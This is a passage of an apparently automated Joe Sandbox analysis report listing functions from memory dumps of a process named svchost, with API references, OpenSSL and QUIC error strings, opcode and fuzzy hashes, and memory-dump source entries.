                                                                                              Function 00007FFBAB4986BB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_clear_flagsO_set_flags
                                                                                              • String ID: ossl_statem_server_read_transition$ssl\statem\statem_srvr.c
                                                                                              • API String ID: 3946675294-702932334
                                                                                              • Opcode ID: 382df98638a1e4465aad15199b773374ec11609d9035a1cbd4d713e8dba48c40
                                                                                              • Instruction ID: 1a025a81d40cc7b5e8961095b57fb147b8c77a2cfcd4dfd099c45f298b68a17f
                                                                                              • Opcode Fuzzy Hash: 382df98638a1e4465aad15199b773374ec11609d9035a1cbd4d713e8dba48c40
                                                                                              • Instruction Fuzzy Hash: 9221B2A1A0A28242FB96DB75D8D53FC2B90EB44788F48C436DE5D87BE2CE7DD4858301
                                                                                              Function 64941AC0 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateSemaphoreA.KERNEL32 ref: 64941B20
                                                                                              • CreateSemaphoreA.KERNEL32 ref: 64941B36
                                                                                              • InitializeCriticalSection.KERNEL32 ref: 64941B5B
                                                                                              • InitializeCriticalSection.KERNEL32 ref: 64941B61
                                                                                              • InitializeCriticalSection.KERNEL32 ref: 64941B67
                                                                                              • CloseHandle.KERNEL32 ref: 64941B90
                                                                                              • CloseHandle.KERNEL32 ref: 64941BA5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalInitializeSection$CloseCreateHandleSemaphore
                                                                                              • String ID:
                                                                                              • API String ID: 3487344249-0
                                                                                              • Opcode ID: eb7254ae0b87aaabb354fe5c7cf01b8aa784702653ead7a0c4080870feffabbc
                                                                                              • Instruction ID: 31c3c2f24a53828e468885d33ffcfcee3f6f88692367c2784a926345d8c92843
                                                                                              • Opcode Fuzzy Hash: eb7254ae0b87aaabb354fe5c7cf01b8aa784702653ead7a0c4080870feffabbc
                                                                                              • Instruction Fuzzy Hash: 40219D327016418AFB099F32F9503AA37E5EB45B98F088139CE2D4B398EF38C495C750
                                                                                              Function 00007FFBAB41A1A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_vset_errorX_freeY_free
                                                                                              • String ID: ssl\s3_lib.c$ssl_generate_param_group
                                                                                              • API String ID: 576972184-387558606
                                                                                              • Opcode ID: 6c832336910e37df2c60674589dbba50d4f605e1a216c7111e2cf0958ac00a81
                                                                                              • Instruction ID: 25b81b905e168040deea149fb3f84b4eb99c232a76c9ef0cedb83d09927575ff
                                                                                              • Opcode Fuzzy Hash: 6c832336910e37df2c60674589dbba50d4f605e1a216c7111e2cf0958ac00a81
                                                                                              • Instruction Fuzzy Hash: 152158A1A5FB8241E661DB76F54116E6350FF84BC0F089435EE6D477AADF3CE4448701
                                                                                              Function 00007FFBAB49833F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$R_vset_error
                                                                                              • String ID: ssl\statem\statem_srvr.c$tls_process_end_of_early_data
                                                                                              • API String ID: 4275876640-1059509600
                                                                                              • Opcode ID: 4485de0aa40c5a7896a7b2ff5e6624c0cb4c7c79709b11956f7b9e4c8be99114
                                                                                              • Instruction ID: 348b769402de6db91a07440c2a594e192e50a93784f04e9190a137bcace21436
                                                                                              • Opcode Fuzzy Hash: 4485de0aa40c5a7896a7b2ff5e6624c0cb4c7c79709b11956f7b9e4c8be99114
                                                                                              • Instruction Fuzzy Hash: 1A1163B2B0D14182E7529B7AE8926FD6351EF80784F488432DF2D876B6DEADD4848315
                                                                                              Function 00007FFBAB47AF10 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$R_vset_error
                                                                                              • String ID: final_renegotiate$ssl\statem\extensions.c
                                                                                              • API String ID: 4275876640-1968291038
                                                                                              • Opcode ID: ec150c88d15395adc615c92e4221016b800d5573465288725ea1e7b60c0f820d
                                                                                              • Instruction ID: 4ba58d7c75a528cce73fd706d3a8ec1a4143cb60cbc5022eadc9ed1c72b3c9f6
                                                                                              • Opcode Fuzzy Hash: ec150c88d15395adc615c92e4221016b800d5573465288725ea1e7b60c0f820d
                                                                                              • Instruction Fuzzy Hash: 9D118CF2B1B38282FB6397B5D892BF822509F40711F848431DE3D466F2DE2CA9D68640
                                                                                              Function 64946E80 Relevance: 10.5, APIs: 7, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CloseCurrentHandleOpen_errno
                                                                                              • String ID:
                                                                                              • API String ID: 2250453136-0
                                                                                              • Opcode ID: 647cea97fea39e1f8afd9dff8aee47f7913a4ca09984285e2b8a4a307c22f2b2
                                                                                              • Instruction ID: c4dd9a8f5984872ef2400fb7ba57e55cf54f323c349d37ceb4cc8f7486eb7d88
                                                                                              • Opcode Fuzzy Hash: 647cea97fea39e1f8afd9dff8aee47f7913a4ca09984285e2b8a4a307c22f2b2
                                                                                              • Instruction Fuzzy Hash: ED01B57538570183EB1D5F65D84831E26E79F4BB69F144228DE29423E1EF3EC968C620
                                                                                              Function 00007FFBAB4308C0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_errorY_free
                                                                                              • String ID: SSL_CTX_use_PrivateKey_ASN1$ssl\ssl_rsa.c
                                                                                              • API String ID: 3531505993-1862755855
                                                                                              • Opcode ID: ed0d18ab2099c77e0a78522ff7d3284bc7cf175882dee49ffdb4f9cbf1770d66
                                                                                              • Instruction ID: 0ae813e58ce3029b2b363d013ac6a9ea10dd8304ab5d824698077d800232f3ac
                                                                                              • Opcode Fuzzy Hash: ed0d18ab2099c77e0a78522ff7d3284bc7cf175882dee49ffdb4f9cbf1770d66
                                                                                              • Instruction Fuzzy Hash: 9801D6A2B0AB4181E651EB36F5812FDA361EF88BC0F548035EF6C43BB6DE3CD5548600
                                                                                              Function 00007FFBAB4129E0 Relevance: 10.5, APIs: 7, Instructions: 39threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$Leave$Enter$CurrentReleaseSemaphoreThread
                                                                                              • String ID:
                                                                                              • API String ID: 4252005047-0
                                                                                              • Opcode ID: c46529817478278fc2bd1f70c2c3e8cb07736d1c93b2ed49c2fcda5e9561b559
                                                                                              • Instruction ID: b6325f3caa9928e10f5b89cb859c4ab8aee5b010b18750466830bc485dbec623
                                                                                              • Opcode Fuzzy Hash: c46529817478278fc2bd1f70c2c3e8cb07736d1c93b2ed49c2fcda5e9561b559
                                                                                              • Instruction Fuzzy Hash: ED11F7B6A1AB02D7DB559F72E59512937B0FB48B84F048435CE1E93724DF38E4A88740
                                                                                              Function 00007FFBAB432C60 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: A_freeR_newR_set_debugR_set_error
                                                                                              • String ID: SSL_CTX_use_RSAPrivateKey_ASN1$ssl\ssl_rsa_legacy.c
                                                                                              • API String ID: 4284916926-3527806555
                                                                                              • Opcode ID: 8ba72beae7d7639a58e8190c9d48f9912f529a2c437f245ef5816c94eae23363
                                                                                              • Instruction ID: 3d1646128d74b7bb71598fee8bbd5b060ece8fcc3756baa90239dc99dda51fb7
                                                                                              • Opcode Fuzzy Hash: 8ba72beae7d7639a58e8190c9d48f9912f529a2c437f245ef5816c94eae23363
                                                                                              • Instruction Fuzzy Hash: AA01D6A1B5964241EA52E776E5822BD6290EF487C0F488436FD7E47BABDD2CD4498600
                                                                                              Function 00007FFBAB466BEC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_printf
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Max Stream Data: %llu$Max stream data
                                                                                              • API String ID: 4098839300-2997325953
                                                                                              • Opcode ID: 891ab0ae919b933d83dc4a02e257d866c9f1b0ab6a12a6ec1125c9ed7e5be16b
                                                                                              • Instruction ID: df2184f1a98eccc7f7d2d3cf45dbbb06a8ca03c3aa6d682d36f52cf8951da621
                                                                                              • Opcode Fuzzy Hash: 891ab0ae919b933d83dc4a02e257d866c9f1b0ab6a12a6ec1125c9ed7e5be16b
                                                                                              • Instruction Fuzzy Hash: A9012CE2E0965384FB26DBB5E8513FD23A1AF44794F409036DE2D4B6A5DE7CE0868301
                                                                                              Function 00007FFBAB456EA0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: expect_quic$ossl_quic_reset$ssl\quic\quic_impl.c
                                                                                              • API String ID: 1552677711-1634402930
                                                                                              • Opcode ID: 9600cdcd5425ecf6749ce272cfe2b585568329d36cf7f1c0e9f756ac37b25d4b
                                                                                              • Instruction ID: 6c659ad0c77f03ff121407d0851a54ab53a3834d0ad3dbfd3760aad6c51bf9af
                                                                                              • Opcode Fuzzy Hash: 9600cdcd5425ecf6749ce272cfe2b585568329d36cf7f1c0e9f756ac37b25d4b
                                                                                              • Instruction Fuzzy Hash: 9701A2B1A0B54292FB67A778D452ABD6661EF00340F40C53AED6D426F1DE3DE988C700
                                                                                              Function 00007FFBAB466BAB Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_printf
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Max Data: %llu$Max data
                                                                                              • API String ID: 4098839300-1929194112
                                                                                              • Opcode ID: 4dbca8024f379955c1d958b78c7429e55b08b5d694a725fdce9a9183ff5156f9
                                                                                              • Instruction ID: ee978d55f53fdd6e6f1b7213c20400a5f1e86c14157019ddae4f853794ac49a8
                                                                                              • Opcode Fuzzy Hash: 4dbca8024f379955c1d958b78c7429e55b08b5d694a725fdce9a9183ff5156f9
                                                                                              • Instruction Fuzzy Hash: 550181E1F0965384FE2ADB75E8513FD1391AF45794F409036DE2D4B6A5DE7CE0868300
                                                                                              Function 00007FFBAB466C95 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_printf
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Max Data: %llu$Data blocked
                                                                                              • API String ID: 4098839300-2931694649
                                                                                              • Opcode ID: cc19025d04c9d1e5c4184106632c55020d344e396dd73dae189ccf0bcab6ce50
                                                                                              • Instruction ID: 29a468480df08e662389808b2f65b6999a48d7bd253dcf53dec5dd7f7a173df5
                                                                                              • Opcode Fuzzy Hash: cc19025d04c9d1e5c4184106632c55020d344e396dd73dae189ccf0bcab6ce50
                                                                                              • Instruction Fuzzy Hash: 670162E1E0965380FA26DBB5E8613FD1351AF40794F409036DE3D0B5E5DE7CE0868201
                                                                                              Function 00007FFBAB466ECE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_printf
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Data: %016llx$Path response
                                                                                              • API String ID: 4098839300-2557722110
                                                                                              • Opcode ID: 2cd10418bdca348c1bddf889d55552fcf8b130cd6c50977f5115fb6d9bc5a203
                                                                                              • Instruction ID: eb4a5ef8d290974ee8ac19aa39029607f40559db1e9eba989da4c2e767c377bc
                                                                                              • Opcode Fuzzy Hash: 2cd10418bdca348c1bddf889d55552fcf8b130cd6c50977f5115fb6d9bc5a203
                                                                                              • Instruction Fuzzy Hash: 9E016DE2E0A64290FE26EB75E8A13FD1350AF40794F50903ADE2E066E5DE3CE4868201
                                                                                              Function 00007FFBAB46AC20 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 32COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RAND_bytes_ex.LIBCRYPTO-3-X64(00000001,00007FFBAB45A52B,?,?,?,?,?,00007FFBAB45A862,00007FFBAB44C589), ref: 00007FFBAB46AC4A
                                                                                              • ERR_new.LIBCRYPTO-3-X64(00000001,00007FFBAB45A52B,?,?,?,?,?,00007FFBAB45A862,00007FFBAB44C589), ref: 00007FFBAB46AC54
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(00000001,00007FFBAB45A52B,?,?,?,?,?,00007FFBAB45A862,00007FFBAB44C589), ref: 00007FFBAB46AC6C
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(00000001,00007FFBAB45A52B,?,?,?,?,?,00007FFBAB45A862,00007FFBAB44C589), ref: 00007FFBAB46AC7D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: D_bytes_exR_newR_set_debugR_set_error
                                                                                              • String ID: ossl_quic_gen_rand_conn_id$ssl\quic\quic_types.c
                                                                                              • API String ID: 10171931-2593383686
                                                                                              • Opcode ID: bc3875f68747eac6f4a3cb9487d58d5cc32c958227c837b3233c4509e4c49879
                                                                                              • Instruction ID: 6fb2bfa9f82eed938ff8d9548f1906eea45558ac163ea12655a45994e62b47f1
                                                                                              • Opcode Fuzzy Hash: bc3875f68747eac6f4a3cb9487d58d5cc32c958227c837b3233c4509e4c49879
                                                                                              • Instruction Fuzzy Hash: 0DF0B4F1E5A28682F763A774D8823FD2751AB10780F94C031DE2D422F6EE2CD9988712
                                                                                              Function 64942D50 Relevance: 9.1, APIs: 6, Instructions: 120COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$FileSystem
                                                                                              • String ID:
                                                                                              • API String ID: 2086374402-0
                                                                                              • Opcode ID: fa800a1db800350b0fed09132d4c30b4d464a2c5f92782d6f3b1fde1cd7d91d6
                                                                                              • Instruction ID: 9532cd4f251b3658310ae2195131a0e08aaebdb09fc5c0f89b68fa3098675641
                                                                                              • Opcode Fuzzy Hash: fa800a1db800350b0fed09132d4c30b4d464a2c5f92782d6f3b1fde1cd7d91d6
                                                                                              • Instruction Fuzzy Hash: 0331AE227855018AFB168F75E90479A63A6FB85BE9F188535CE18CB384EF38C891C350
                                                                                              Function 649449D0 Relevance: 9.1, APIs: 6, Instructions: 104sleepthreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value$CloseCurrentHandleSleepThread__iob_func_endthreadex
                                                                                              • String ID:
                                                                                              • API String ID: 2572950730-0
                                                                                              • Opcode ID: 41b3f4f05ea4d5a442d3e756eee48522d3bf42455cc12e4d92245cde5d4bd361
                                                                                              • Instruction ID: b6c95add572710b94ebec18b46ddd7a509098b6565972d843aeaf9d7d1c37827
                                                                                              • Opcode Fuzzy Hash: 41b3f4f05ea4d5a442d3e756eee48522d3bf42455cc12e4d92245cde5d4bd361
